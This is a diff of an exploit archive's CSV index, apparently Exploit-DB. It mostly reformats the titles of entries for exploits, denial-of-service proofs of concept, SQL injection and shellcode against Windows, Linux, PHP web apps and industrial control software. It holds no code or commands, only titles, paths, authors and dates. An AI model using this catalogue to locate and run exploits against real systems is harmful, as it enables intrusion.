+17762,platforms/windows/remote/17762.rb,"Citrix Gateway - ActiveX Control Stack Based Buffer Overflow Vulnerability",2011-08-31,metasploit,windows,remote,0 17763,platforms/php/webapps/17763.txt,"WordPress Donation plugin <= 1.0 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 17764,platforms/php/webapps/17764.txt,"Wordpress Plugin Bannerize <= 2.8.6 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 17766,platforms/windows/webapps/17766.txt,"NetSaro Enterprise Messenger 2.0 - Multiple Vulnerabilities",2011-09-01,"Narendra Shinde",windows,webapps,0 @@ -15454,7 +15454,7 @@ id,file,description,date,author,platform,type,port 17831,platforms/windows/dos/17831.txt,"Microsoft WINS ECommEndDlg Input Validation Error",2011-09-13,"Core Security",windows,dos,0 17832,platforms/php/webapps/17832.txt,"Wordpress Plugin e-Commerce <= 3.8.6 - SQL Injection Vulnerability",2011-09-14,"Miroslav Stampar",php,webapps,0 17833,platforms/windows/local/17833.rb,"ScadaTEC ScadaPhone <= 5.3.11.1230 - Stack Buffer Overflow",2011-09-13,metasploit,windows,local,0 -17835,platforms/windows/dos/17835.txt,"Beckhoff TwinCAT <= 2.11.0.2004 Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 +17835,platforms/windows/dos/17835.txt,"Beckhoff TwinCAT <= 2.11.0.2004 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 17836,platforms/windows/dos/17836.txt,"Equis MetaStock <= 11 Use After Free",2011-09-14,"Luigi Auriemma",windows,dos,0 17837,platforms/windows/dos/17837.txt,"eSignal and eSignal Pro <= 10.6.2425.1208 - Multiple Vulnerabilites",2011-09-14,"Luigi Auriemma",windows,dos,0 17838,platforms/windows/dos/17838.txt,"Cogent DataHub <= 7.1.1.63 - Stack Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 @@ -15462,7 +15462,7 @@ id,file,description,date,author,platform,type,port 17840,platforms/windows/webapps/17840.txt,"Cogent DataHub <= 7.1.1.63 Source Disclosure",2011-09-14,"Luigi Auriemma",windows,webapps,0 17841,platforms/windows/dos/17841.txt,"DAQFactory <= 5.85 build 1853 - Stack Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 17842,platforms/windows/dos/17842.txt,"progea movicon / powerhmi <= 11.2.1085 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 -17843,platforms/windows/dos/17843.txt,"Rockwell RSLogix <= 19 Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 +17843,platforms/windows/dos/17843.txt,"Rockwell RSLogix <= 19 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 17844,platforms/windows/dos/17844.txt,"Measuresoft ScadaPro <= 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 17846,platforms/jsp/webapps/17846.php,"Nortel Contact Recording Centralized Archive 6.5.1 - SQL Injection Exploit",2011-09-15,rgod,jsp,webapps,0 17847,platforms/windows/local/17847.py,"Mini-Stream Ripper 2.9.7 - DEP Bypass",2011-09-16,blake,windows,local,0 @@ -15566,7 +15566,7 @@ id,file,description,date,author,platform,type,port 17962,platforms/php/webapps/17962.txt,"MyBB Forum Userbar Plugin (Userbar 2.2) - SQL Injection",2011-10-10,Mario_Vs,php,webapps,0 17963,platforms/windows/dos/17963.txt,"atvise webMI2ADS Web Server <= 1.0 - Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",windows,dos,0 17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN <= 8.0.0.7 Use After Free",2011-10-10,"Luigi Auriemma",windows,dos,0 -17965,platforms/windows/dos/17965.txt,"OPC Systems.NET <= 4.00.0048 Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos,0 +17965,platforms/windows/dos/17965.txt,"OPC Systems.NET <= 4.00.0048 - Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos,0 17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate PLP File id Parameter Overflow",2011-10-10,metasploit,windows,local,0 17967,platforms/windows/local/17967.rb,"TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability",2011-10-11,metasploit,windows,local,0 17969,platforms/multiple/remote/17969.py,"Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC",2011-10-11,"Rodrigo Marcos",multiple,remote,0 @@ -15654,7 +15654,7 @@ id,file,description,date,author,platform,type,port 18064,platforms/linux/local/18064.sh,"Calibre E-Book Reader Local Root Exploit",2011-11-02,zx2c4,linux,local,0 18065,platforms/php/webapps/18065.txt,"SetSeed CMS 5.8.20 (loggedInUser) Remote SQL Injection Vulnerability",2011-11-02,LiquidWorm,php,webapps,0 18066,platforms/php/webapps/18066.txt,"CaupoShop Pro (2.x/ <= 3.70) Classic 3.01 - Local File Include Vulnerability",2011-11-02,"Rami Salama",php,webapps,0 -18067,platforms/windows/local/18067.txt,"Microsoft Excel 2007 SP2 Buffer Overwrite Exploit",2011-11-02,Abysssec,windows,local,0 +18067,platforms/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite Exploit",2011-11-02,Abysssec,windows,local,0 18068,platforms/hardware/remote/18068.rb,"LifeSize Room Command Injection",2011-11-02,metasploit,hardware,remote,0 18069,platforms/php/webapps/18069.txt,"Jara 1.6 - Multiple Vulnerabilities",2011-11-03,Or4nG.M4N,php,webapps,0 18070,platforms/php/webapps/18070.txt,"Web File Browser 0.4b14 File Download Vulnerability",2011-11-03,"Sangyun YOO",php,webapps,0 @@ -15875,7 +15875,7 @@ id,file,description,date,author,platform,type,port 18372,platforms/windows/local/18372.txt,"Microsoft Windows Assembly Execution Vulnerability (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0 18373,platforms/jsp/webapps/18373.txt,"Cloupia End-to-end FlexPod Management Directory Traversal",2012-01-15,"Chris Rock",jsp,webapps,0 18374,platforms/php/webapps/18374.txt,"PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities",2012-01-16,Or4nG.M4N,php,webapps,0 -18375,platforms/windows/local/18375.rb,"BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)",2012-01-17,metasploit,windows,local,0 +18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow Exploit (Unicode SEH)",2012-01-17,metasploit,windows,local,0 18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport Remote Command Execution",2012-01-17,metasploit,windows,remote,0 18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 mChannel use after free Vulnerability",2012-01-17,metasploit,osx,remote,0 18378,platforms/linux/dos/18378.c,"Linux IGMP Remote Denial of Service (Introduced in linux-2.6.36)",2012-01-17,kingcope,linux,dos,0 @@ -15940,7 +15940,7 @@ id,file,description,date,author,platform,type,port 18451,platforms/windows/webapps/18451.txt,"Sphinix Mobile Web Server 3.1.2.47 - Multiple Persistent XSS Vulnerabilities",2012-02-02,"SecPod Research",windows,webapps,0 18452,platforms/multiple/webapps/18452.txt,"Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",multiple,webapps,0 18453,platforms/windows/dos/18453.txt,"OfficeSIP Server 3.1 - Denial of Service Vulnerability",2012-02-02,"SecPod Research",windows,dos,0 -18454,platforms/windows/dos/18454.txt,"NetSarang Xlpd Printer Daemon 4 Denial of Service Vulnerability",2012-02-02,"SecPod Research",windows,dos,0 +18454,platforms/windows/dos/18454.txt,"NetSarang Xlpd Printer Daemon 4 - Denial of Service Vulnerability",2012-02-02,"SecPod Research",windows,dos,0 18455,platforms/php/webapps/18455.txt,"OSCommerce 3.0.2 - Persistent Cross-Site Vulnerability",2012-02-02,Vulnerability-Lab,php,webapps,0 18456,platforms/php/webapps/18456.txt,"Achievo 1.4.3 - Multiple Web Vulnerabilities",2012-02-02,Vulnerability-Lab,php,webapps,0 18457,platforms/linux/dos/18457.py,"torrent-stats httpd.c Denial of Service",2012-02-03,otr,linux,dos,0 @@ -15959,7 +15959,7 @@ id,file,description,date,author,platform,type,port 18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Include Vulnerability",2012-02-08,Vulnerability-Lab,multiple,webapps,0 18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 BSOD",2012-02-09,shinnai,windows,dos,0 18476,platforms/windows/remote/18476.py,"Sysax Multi Server <= 5.52 File Rename BoF RCE (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0 -18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow",2012-02-10,metasploit,windows,remote,0 +18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow",2012-02-10,metasploit,windows,remote,0 18479,platforms/windows/remote/18479.rb,"Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",2012-02-10,metasploit,windows,remote,0 18480,platforms/php/webapps/18480.txt,"Dolibarr CMS 3.2.0 - Alpha - File Include Vulnerabilities",2012-02-10,Vulnerability-Lab,php,webapps,0 18481,platforms/windows/dos/18481.py,"jetVideo 8.0.2 - Denial of Service",2012-02-10,"Senator of Pirates",windows,dos,0 @@ -15971,7 +15971,7 @@ id,file,description,date,author,platform,type,port 18490,platforms/windows/dos/18490.txt,"Novell GroupWise Messenger Client <= 2.1.0 Unicode Stack Overflow",2012-02-16,"Luigi Auriemma",windows,dos,0 18491,platforms/windows/dos/18491.txt,"xnview <= 1.98.5 - Multiple Vulnerabilities",2012-02-16,"Luigi Auriemma",windows,dos,0 18492,platforms/linux/remote/18492.rb,"Horde 3.3.12 Backdoor Arbitrary PHP Code Execution",2012-02-17,metasploit,linux,remote,0 -18493,platforms/windows/dos/18493.py,"PCAnywhere 12.5.0 build 463 Denial of Service",2012-02-17,"Johnathan Norman",windows,dos,0 +18493,platforms/windows/dos/18493.py,"PCAnywhere 12.5.0 build 463 - Denial of Service",2012-02-17,"Johnathan Norman",windows,dos,0 18494,platforms/php/webapps/18494.txt,"Pandora Fms 4.0.1 - Local File Include Vulnerability",2012-02-17,Vulnerability-Lab,php,webapps,0 18495,platforms/php/webapps/18495.html,"almnzm 2.4 - CSRF Vulnerability (Add Admin)",2012-02-18,"HaNniBaL KsA",php,webapps,0 18497,platforms/php/webapps/18497.txt,"4PSA CMS SQL Injection Vulnerabilities",2012-02-19,"BHG Security Center",php,webapps,0 @@ -15988,7 +15988,7 @@ id,file,description,date,author,platform,type,port 18509,platforms/hardware/webapps/18509.html,"Dlink DCS series CSRF Change Admin Password",2012-02-22,rigan,hardware,webapps,0 18510,platforms/windows/webapps/18510.txt,"webcamxp and webcam 7 - Directory Traversal Vulnerability",2012-02-22,Silent_Dream,windows,webapps,0 18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0 -18512,platforms/windows/dos/18512.txt,"Unity 3D Web Player <= 3.2.0.61061 Denial of Service",2012-02-22,"Luigi Auriemma",windows,dos,0 +18512,platforms/windows/dos/18512.txt,"Unity 3D Web Player <= 3.2.0.61061 - Denial of Service",2012-02-22,"Luigi Auriemma",windows,dos,0 18513,platforms/php/webapps/18513.txt,"DFLabs PTK <= 1.0.5 - Multiple Vulnerabilities (Steal Authentication Credentials)",2012-02-22,"Ivano Binetti",php,webapps,0 18514,platforms/windows/remote/18514.rb,"TrendMicro Control Manger <= 5.5 CmdProcessor.exe - Stack Buffer Overflow",2012-02-23,metasploit,windows,remote,0 18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow",2012-02-23,metasploit,windows,local,0 @@ -16043,7 +16043,7 @@ id,file,description,date,author,platform,type,port 18579,platforms/linux/dos/18579.txt,"PyPAM - Python bindings for PAM - Double Free Corruption",2012-03-10,"Markus Vervier",linux,dos,0 18582,platforms/cgi/webapps/18582.txt,"Zend Server 5.6.0 - Multiple Remote Script Insertion Vulnerabilities",2012-03-12,LiquidWorm,cgi,webapps,0 18583,platforms/php/webapps/18583.txt,"Saman Portal Local File Inclusion Vulnerability",2012-03-12,TMT,php,webapps,0 -18584,platforms/windows/dos/18584.txt,"GOM Media Player 2.1.37 Buffer Overflow Vulnerability",2012-03-12,longrifle0x,windows,dos,0 +18584,platforms/windows/dos/18584.txt,"GOM Media Player 2.1.37 - Buffer Overflow Vulnerability",2012-03-12,longrifle0x,windows,dos,0 18585,platforms/lin_x86-64/shellcode/18585.s,"Linux x86_64 - add user with passwd (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0 18586,platforms/windows/dos/18586.txt,"XnView FlashPix Image Processing Heap Overflow",2012-03-12,"Francis Provencher",windows,dos,0 18587,platforms/windows/dos/18587.py,"Network Instrument Observer SNMP SetRequest Denial of Service Vulnerability",2012-03-12,"Francis Provencher",windows,dos,0 @@ -16058,8 +16058,8 @@ id,file,description,date,author,platform,type,port 18598,platforms/php/webapps/18598.txt,"Encaps PHP Gallery SQL Injection",2012-03-14,"Daniel Godoy",php,webapps,0 18599,platforms/php/webapps/18599.txt,"asaanCart XSS/LFI Vulnerabilities",2012-03-14,"Number 7",php,webapps,0 18600,platforms/multiple/dos/18600.txt,"presto! pagemanager <= 9.01 - Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",multiple,dos,0 -18601,platforms/multiple/dos/18601.txt,"EMC NetWorker <= 7.6 sp3 Denial of Service",2012-03-14,"Luigi Auriemma",multiple,dos,0 -18602,platforms/windows/dos/18602.txt,"Epson EventManager <= 2.50 Denial of Service",2012-03-14,"Luigi Auriemma",windows,dos,0 +18601,platforms/multiple/dos/18601.txt,"EMC NetWorker <= 7.6 sp3 - Denial of Service",2012-03-14,"Luigi Auriemma",multiple,dos,0 +18602,platforms/windows/dos/18602.txt,"Epson EventManager <= 2.50 - Denial of Service",2012-03-14,"Luigi Auriemma",windows,dos,0 18603,platforms/windows/webapps/18603.txt,"TVersity <= 1.9.7 Arbitrary File Download",2012-03-14,"Luigi Auriemma",windows,webapps,0 18604,platforms/windows/remote/18604.rb,"NetDecision 4.5.1 HTTP Server Buffer Overflow",2012-03-15,metasploit,windows,remote,0 18605,platforms/windows/webapps/18605.txt,"sockso <= 1.5 - Directory Traversal",2012-03-15,"Luigi Auriemma",windows,webapps,0 @@ -16133,7 +16133,7 @@ id,file,description,date,author,platform,type,port 18687,platforms/php/webapps/18687.txt,"Landshop 0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,php,webapps,0 18688,platforms/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",hardware,dos,0 18689,platforms/php/webapps/18689.txt,"Woltlab Burning Board 2.2 / 2.3 [WN]KT KickTipp 3.1 - Remote SQL Injection",2012-03-31,"Easy Laster",php,webapps,0 -18690,platforms/php/webapps/18690.txt,"Buddypress plugin of Wordpress remote SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 +18690,platforms/php/webapps/18690.txt,"Buddypress plugin of Wordpress Remote SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0 18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - (.aiff) Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0 @@ -16181,7 +16181,7 @@ id,file,description,date,author,platform,type,port 18743,platforms/php/webapps/18743.txt,"MediaXxx Adult Video / Media Script SQL Injection",2012-04-15,"Daniel Godoy",php,webapps,0 18745,platforms/multiple/webapps/18745.txt,"ManageEngine Support Center Plus <= 7903 - Multiple Vulnerabilities",2012-04-15,xistence,multiple,webapps,0 18747,platforms/windows/local/18747.rb,"CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit",2012-04-18,metasploit,windows,local,0 -18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 Buffer Overflow",2012-04-18,metasploit,windows,local,0 +18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 - Buffer Overflow",2012-04-18,metasploit,windows,local,0 18749,platforms/osx/local/18749.py,"Office 2008 sp0 RTF Pfragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0 18750,platforms/multiple/webapps/18750.txt,"Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities",2012-04-19,"Trustwave's SpiderLabs",multiple,webapps,0 18751,platforms/hardware/dos/18751.txt,"Samsung D6000 TV Multiple Vulnerabilities",2012-04-19,"Luigi Auriemma",hardware,dos,0 @@ -16204,7 +16204,7 @@ id,file,description,date,author,platform,type,port 18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - (.chm) & (.mobi) Memory Corruption",2012-04-23,shinnai,windows,dos,0 18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0 18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Y?lmaz",php,webapps,0 -18774,platforms/windows/dos/18774.txt,"Mobipocket Reader 6.2 Build 608 Buffer Overflow",2012-04-23,shinnai,windows,dos,0 +18774,platforms/windows/dos/18774.txt,"Mobipocket Reader 6.2 Build 608 - Buffer Overflow",2012-04-23,shinnai,windows,dos,0 18775,platforms/php/webapps/18775.php,"WebCalendar <= 1.2.4 - (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0 18776,platforms/windows/dos/18776.txt,"BeyondCHM 1.1 - Buffer Overflow",2012-04-24,shinnai,windows,dos,0 18777,platforms/windows/dos/18777.txt,".NET Framework EncoderParameter Integer Overflow Vulnerability",2012-04-24,"Akita Software Security",windows,dos,0 @@ -16223,7 +16223,7 @@ id,file,description,date,author,platform,type,port 18795,platforms/windows/dos/18795.py,"Nokia PC Suite Video Manager 7.1.180.64 - (.mp4) Denial of Service",2012-04-27,"Senator of Pirates",windows,dos,0 18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 Pre-Auth Remote Code Injection",2012-04-29,metasploit,linux,webapps,0 18798,platforms/php/webapps/18798.txt,"Soco CMS Local File Include Vulnerability",2012-04-29,"BHG Security Center",php,webapps,0 -18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0 +18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0 18800,platforms/php/webapps/18800.txt,"Alienvault OSSIM Open Source SIEM 3.1 - Multiple Security Vulnerabilities",2012-04-29,"Stefan Schurtz",php,webapps,0 18801,platforms/php/webapps/18801.txt,"Car Portal CMS 3.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18802,platforms/asp/webapps/18802.txt,"C4B XPhone UC Web 4.1.890S R1 - XSS Vulnerability",2012-04-30,Vulnerability-Lab,asp,webapps,0 @@ -16333,7 +16333,7 @@ id,file,description,date,author,platform,type,port 18941,platforms/php/webapps/18941.txt,"PHP Volunteer Management System 1.0.2 - Multiple Vulnerabilities",2012-05-28,Ashoo,php,webapps,0 18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability",2012-05-28,metasploit,linux,remote,0 18944,platforms/php/webapps/18944.txt,"PHP Volunteer Management System 1.0.2 - Multiple SQL Injection Vulnerabilities",2012-05-28,loneferret,php,webapps,0 -18945,platforms/windows/dos/18945.txt,"WinRadius Server 2009 Denial of Service",2012-05-29,demonalex,windows,dos,0 +18945,platforms/windows/dos/18945.txt,"WinRadius Server 2009 - Denial of Service",2012-05-29,demonalex,windows,dos,0 18946,platforms/windows/dos/18946.txt,"Tftpd32 DNS Server 4.00 - Denial of Service",2012-05-29,demonalex,windows,dos,0 18947,platforms/windows/local/18947.rb,"ispVM System XCF File Handling Overflow",2012-05-29,metasploit,windows,local,0 18948,platforms/php/webapps/18948.txt,"PBBoard 2.1.4 - Multiple SQL Injection Vulnerabilities",2012-05-29,loneferret,php,webapps,0 @@ -16351,9 +16351,9 @@ id,file,description,date,author,platform,type,port 18962,platforms/windows/dos/18962.py,"Sorensoft Power Media 6.0 - Denial of Service",2012-05-31,Onying,windows,dos,0 18964,platforms/windows/dos/18964.txt,"IrfanView 4.33 Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0 18965,platforms/php/webapps/18965.html,"4psa voipnow professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0 -18967,platforms/windows/remote/18967.rb,"Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 -18968,platforms/windows/remote/18968.rb,"Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 -18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 +18967,platforms/windows/remote/18967.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020004 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 +18968,platforms/windows/remote/18968.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020006 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 +18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 18970,platforms/php/webapps/18970.txt,"Membris 2.0.1 - Multiple Vulnerabilities",2012-06-01,Dr.abolalh,php,webapps,0 18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 18973,platforms/windows/remote/18973.rb,"GIMP script-fu Server Buffer Overflow",2012-06-02,metasploit,windows,remote,0 @@ -16369,7 +16369,7 @@ id,file,description,date,author,platform,type,port 18983,platforms/php/webapps/18983.php,"Mnews <= 1.1 (view.php) SQL Injection",2012-06-04,WhiteCollarGroup,php,webapps,0 18984,platforms/multiple/remote/18984.rb,"Apache Struts <= 2.2.1.1 - Remote Command Execution",2012-06-05,metasploit,multiple,remote,0 18985,platforms/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,php,webapps,0 -18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog <= 2.07.16 Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 +18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog <= 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 18987,platforms/php/webapps/18987.php,"Wordpress WP-Property Plugin 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18988,platforms/php/webapps/18988.php,"Wordpress Plugin Marketplace Plugin 1.5.0 - 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18989,platforms/php/webapps/18989.php,"Wordpress Google Maps via Store Locator Plugin 2.7.1 - 3.0.1 - Multiple Vulnerabilities",2012-06-05,"Sammy FORGIT",php,webapps,0 @@ -16380,7 +16380,7 @@ id,file,description,date,author,platform,type,port 18997,platforms/php/webapps/18997.php,"Wordpress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18998,platforms/php/webapps/18998.php,"Wordpress Gallery Plugin 3.06 Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18999,platforms/php/webapps/18999.php,"SN News (visualiza.php) <= 1.2 - SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 -19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 Denial of Service Vulnerability",2012-06-06,Onying,windows,dos,0 +19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service Vulnerability",2012-06-06,Onying,windows,dos,0 19002,platforms/windows/remote/19002.rb,"Microsoft Windows OLE Object File Handling Remote Code Execution",2012-06-06,metasploit,windows,remote,0 19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Stored XSS",2012-06-06,"Henry Hoggard",php,webapps,0 19005,platforms/php/webapps/19005.txt,"SN News <= 1.2 (/admin/loger.php) Admin Bypass SQL Injection",2012-06-07,"Yakir Wizman",php,webapps,0 @@ -16474,7 +16474,7 @@ id,file,description,date,author,platform,type,port 19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1,SCO Unixware <= 7.1.1,SGI IRIX <= 5.3,Sun Solaris <= 2.5.1",1997-11-24,anonymous,linux,remote,0 19105,platforms/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 Count.cgi Buffer Overflow Vulnerability",1997-10-16,"Razvan Dragomirescu",linux,remote,0 19106,platforms/linux/local/19106.c,"BSDI BSD/OS <= 2.1,FreeBSD <= 2.1,IBM AIX <= 4.2,SGI IRIX <= 6.4,Sun SunOS <= 4.1.3",1996-07-03,"Jeff Uphoff",linux,local,0 -19107,platforms/linux/remote/19107.c,"Netscape Messaging Server 3.55,University of Washington imapd 10.234 Buffer Overflow Vulnerability",1998-07-17,anonymous,linux,remote,0 +19107,platforms/linux/remote/19107.c,"Netscape Messaging Server 3.55,University of Washington imapd 10.234 - Buffer Overflow Vulnerability",1998-07-17,anonymous,linux,remote,0 19108,platforms/unix/local/19108.txt,"HP HP-UX 10.20/11.0,IBM AIX <= 4.3,SCO Unixware 7.0,Sun Solaris <= 2.6",1999-11-03,Mastoras,unix,local,0 19109,platforms/linux/remote/19109.c,"Qualcomm qpopper 2.4 POP Server Buffer Overflow Vulnerability (1)",1998-06-27,"Seth McGann",linux,remote,0 19110,platforms/unix/remote/19110.c,"Qualcomm qpopper 2.4 POP Server Buffer Overflow Vulnerability (2)",1998-06-27,"Miroslaw Grzybek",unix,remote,0 @@ -16783,7 +16783,7 @@ id,file,description,date,author,platform,type,port 19447,platforms/multiple/local/19447.c,"NetBSD <= 1.4,OpenBSD <= 2.5,Solaris <= 7.0 profil(2) Vulnerability",1999-08-09,"Ross Harvey",multiple,local,0 19448,platforms/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Buffer Overflow Vulnerability",1999-08-03,UNYUN,windows,remote,0 19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R ""Topic"" Buffer Overflow Vulnerability",1999-08-03,UNYUN,windows,remote,0 -19450,platforms/windows/remote/19450.c,"CREAR ALMail32 1.10 Buffer Overflow Vulnerability",1999-08-08,UNYUN,windows,remote,0 +19450,platforms/windows/remote/19450.c,"CREAR ALMail32 1.10 - Buffer Overflow Vulnerability",1999-08-08,UNYUN,windows,remote,0 19451,platforms/multiple/remote/19451.txt,"Microsoft Windows 98 a/98 b/98SE,Solaris 2.6 IRDP Vulnerability",1999-08-11,L0pth,multiple,remote,0 19452,platforms/php/webapps/19452.txt,"phpmoneybooks 1.03 - Stored XSS",2012-06-29,chap0,php,webapps,0 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 - Local DoS",2012-06-29,0in,windows,dos,0 @@ -16791,7 +16791,7 @@ id,file,description,date,author,platform,type,port 19456,platforms/windows/dos/19456.txt,"PowerNet Twin Client <= 8.9 (RFSync 1.0.0.1) Crash PoC",2012-06-29,"Luigi Auriemma",windows,dos,0 19457,platforms/multiple/dos/19457.txt,"Microsoft Commercial Internet System 2.0/2.5,IIS 4.0,Site Server Commerce Edition 3.0 alpha/3.0 DoS",1999-08-11,"Nobuo Miwa",multiple,dos,0 19458,platforms/linux/remote/19458.c,"Linux kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing Vulnerability",1999-07-31,Nergal,linux,remote,0 -19459,platforms/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 Buffer Overflow Vulnerability",1999-08-13,"jduck and stranjer",multiple,remote,0 +19459,platforms/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 - Buffer Overflow Vulnerability",1999-08-13,"jduck and stranjer",multiple,remote,0 19460,platforms/multiple/local/19460.sh,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (1)",1999-08-16,"Brock Tellier",multiple,local,0 19461,platforms/multiple/local/19461.c,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (2)",1999-08-16,"Gilles PARC",multiple,local,0 19462,platforms/windows/local/19462.c,"Microsoft Windows 95/98 IE5/Telnet Heap Overflow Vulnerability",1999-08-16,"Jeremy Kothe",windows,local,0 @@ -16817,7 +16817,7 @@ id,file,description,date,author,platform,type,port 19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 FIT File Format DoS",2012-06-30,"Joseph Sheridan",multiple,dos,0 19483,platforms/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0 19484,platforms/windows/remote/19484.rb,"HP Data Protector Create New Folder Buffer Overflow",2012-07-01,metasploit,windows,remote,3817 -19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 Buffer Overflow Vulnerabilities",1999-08-31,"Przemyslaw Frasunek",linux,local,0 +19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Buffer Overflow 